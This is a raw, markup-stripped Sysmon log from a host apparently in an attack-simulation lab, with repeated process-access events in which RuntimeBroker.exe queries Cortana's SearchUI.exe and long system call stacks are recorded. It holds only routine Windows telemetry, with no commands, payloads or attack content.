13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 